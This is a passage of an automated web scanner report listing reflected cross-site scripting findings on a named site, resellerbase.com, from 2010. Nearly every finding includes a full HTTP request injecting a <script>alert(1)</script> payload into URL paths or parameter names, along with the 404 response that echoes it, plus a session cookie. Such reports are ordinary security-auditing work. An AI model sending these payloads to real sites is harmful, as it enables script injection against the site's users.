
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2&80729<script>alert(1)</script>98edb0f8ed7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2&80729<script>alert(1)</script>98edb0f8ed7=1 was not found on this server.</p>
...[SNIP]...

2.5367. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 947d0<a>0cfb8ab720d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2947d0<a>0cfb8ab720d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2947d0<a>0cfb8ab720d was not found on this server.</p>
...[SNIP]...

2.5368. http://www.resellerbase.com/web-service/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 160d1<script>alert(1)</script>69906e57618 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service160d1<script>alert(1)</script>69906e57618/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service160d1<script>alert(1)</script>69906e57618/themes/ was not found on this server.</p>
...[SNIP]...

2.5369. http://www.resellerbase.com/web-service/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee0f6<script>alert(1)</script>0cbf3bbf04c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesee0f6<script>alert(1)</script>0cbf3bbf04c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesee0f6<script>alert(1)</script>0cbf3bbf04c/ was not found on this server.</p>
...[SNIP]...

2.5370. http://www.resellerbase.com/web-service/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc815<script>alert(1)</script>0f6aa34e8e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/?cc815<script>alert(1)</script>0f6aa34e8e4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/?cc815<script>alert(1)</script>0f6aa34e8e4=1 was not found on this server.</p>
...[SNIP]...

2.5371. http://www.resellerbase.com/web-service/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea5df<script>alert(1)</script>e360c47e213 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceea5df<script>alert(1)</script>e360c47e213/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceea5df<script>alert(1)</script>e360c47e213/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5372. http://www.resellerbase.com/web-service/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3be6f<script>alert(1)</script>efdf829f89e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes3be6f<script>alert(1)</script>efdf829f89e/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes3be6f<script>alert(1)</script>efdf829f89e/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5373. http://www.resellerbase.com/web-service/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d13bf<script>alert(1)</script>62aff67c4a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosd13bf<script>alert(1)</script>62aff67c4a9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosd13bf<script>alert(1)</script>62aff67c4a9/ was not found on this server.</p>
...[SNIP]...

2.5374. http://www.resellerbase.com/web-service/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c86d9<script>alert(1)</script>b8333b03f5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/?c86d9<script>alert(1)</script>b8333b03f5a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/?c86d9<script>alert(1)</script>b8333b03f5a=1 was not found on this server.</p>
...[SNIP]...

2.5375. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ed2f<script>alert(1)</script>b498d6aa36d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service4ed2f<script>alert(1)</script>b498d6aa36d/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service4ed2f<script>alert(1)</script>b498d6aa36d/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5376. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fee1e<script>alert(1)</script>bd76edbb23f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themesfee1e<script>alert(1)</script>bd76edbb23f/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themesfee1e<script>alert(1)</script>bd76edbb23f/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5377. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7936<script>alert(1)</script>3b694c5beea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosb7936<script>alert(1)</script>3b694c5beea/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosb7936<script>alert(1)</script>3b694c5beea/images/ was not found on this server.</p>
...[SNIP]...

2.5378. http://www.resellerbase.com/web-service/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be3b4<script>alert(1)</script>9d7dc659596 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesbe3b4<script>alert(1)</script>9d7dc659596/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesbe3b4<script>alert(1)</script>9d7dc659596/ was not found on this server.</p>
...[SNIP]...

2.5379. http://www.resellerbase.com/web-service/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 315d4<script>alert(1)</script>4d9bef640d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/?315d4<script>alert(1)</script>4d9bef640d7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/?315d4<script>alert(1)</script>4d9bef640d7=1 was not found on this server.</p>
...[SNIP]...

2.5380. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 10bcd<script>alert(1)</script>b97d9e818e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service10bcd<script>alert(1)</script>b97d9e818e9/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service10bcd<script>alert(1)</script>b97d9e818e9/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5381. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3053a<script>alert(1)</script>0510839a106 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes3053a<script>alert(1)</script>0510839a106/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes3053a<script>alert(1)</script>0510839a106/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5382. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 42975<script>alert(1)</script>35519a81506 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos42975<script>alert(1)</script>35519a81506/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos42975<script>alert(1)</script>35519a81506/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5383. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ed3e8<script>alert(1)</script>7823fa08fb5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/imagesed3e8<script>alert(1)</script>7823fa08fb5/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/imagesed3e8<script>alert(1)</script>7823fa08fb5/folder.gif was not found on this server.</p>
...[SNIP]...

2.5384. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 135d3<script>alert(1)</script>bbc8601e97c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/folder.gif135d3<script>alert(1)</script>bbc8601e97c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/folder.gif135d3<script>alert(1)</script>bbc8601e97c was not found on this server.</p>
...[SNIP]...

2.5385. http://www.resellerbase.com/web-service/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 79b1a<script>alert(1)</script>25cdd6c090e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/folder.gif?79b1a<script>alert(1)</script>25cdd6c090e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
